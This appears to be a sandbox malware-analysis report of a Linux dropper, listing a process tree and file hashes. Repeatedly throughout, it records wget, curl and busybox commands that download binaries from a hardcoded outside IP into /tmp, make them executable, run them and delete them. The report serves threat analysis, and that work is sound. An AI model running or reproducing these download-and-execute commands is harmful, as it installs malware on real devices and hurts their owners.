/usr/bin/wgetwget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵PID:940
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵PID:942
-
/bin/chmodchmod 777 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- File and Directory Permissions Modification
PID:943 -
/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY./GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Executes dropped EXE
PID:944 -
/bin/rmrm GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵PID:945
-
/usr/bin/wgetwget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵PID:946
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵PID:948
-
/bin/chmodchmod 777 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- File and Directory Permissions Modification
PID:949 -
/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2./RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Executes dropped EXE
PID:950 -
/bin/rmrm RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵PID:951
-
/usr/bin/wgetwget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵PID:952
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵PID:954
-
/bin/chmodchmod 777 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- File and Directory Permissions Modification
PID:955 -
/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf./gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Executes dropped EXE
PID:956 -
/bin/rmrm gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵PID:957
-
/usr/bin/wgetwget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵PID:958
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵PID:960
-
/bin/chmodchmod 777 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- File and Directory Permissions Modification
PID:961 -
/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu./V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Executes dropped EXE
PID:962 -
/bin/rmrm V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵PID:963
-
/usr/bin/wgetwget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵PID:964
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵PID:966
-
/bin/chmodchmod 777 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- File and Directory Permissions Modification
PID:967 -
/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48./rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Executes dropped EXE
PID:968 -
/bin/rmrm rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵PID:969
-
/usr/bin/wgetwget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵PID:970
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵PID:972
-
/bin/chmodchmod 777 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- File and Directory Permissions Modification
PID:973 -
/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq./kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Executes dropped EXE
PID:974 -
/bin/rmrm kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵PID:975
-
/usr/bin/wgetwget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵PID:976
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵PID:978
-
/bin/chmodchmod 777 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- File and Directory Permissions Modification
PID:979 -
/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl./sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Executes dropped EXE
PID:980 -
/bin/rmrm sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵PID:981
-
/usr/bin/wgetwget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵PID:982
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵PID:984
-
/bin/chmodchmod 777 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- File and Directory Permissions Modification
PID:985 -
/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt./47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Executes dropped EXE
PID:986 -
/bin/rmrm 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵PID:987
-
/usr/bin/wgetwget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵PID:988
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵PID:990
-
/bin/chmodchmod 777 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- File and Directory Permissions Modification
PID:991 -
/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw./9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Executes dropped EXE
PID:992 -
/bin/rmrm 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵PID:993
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97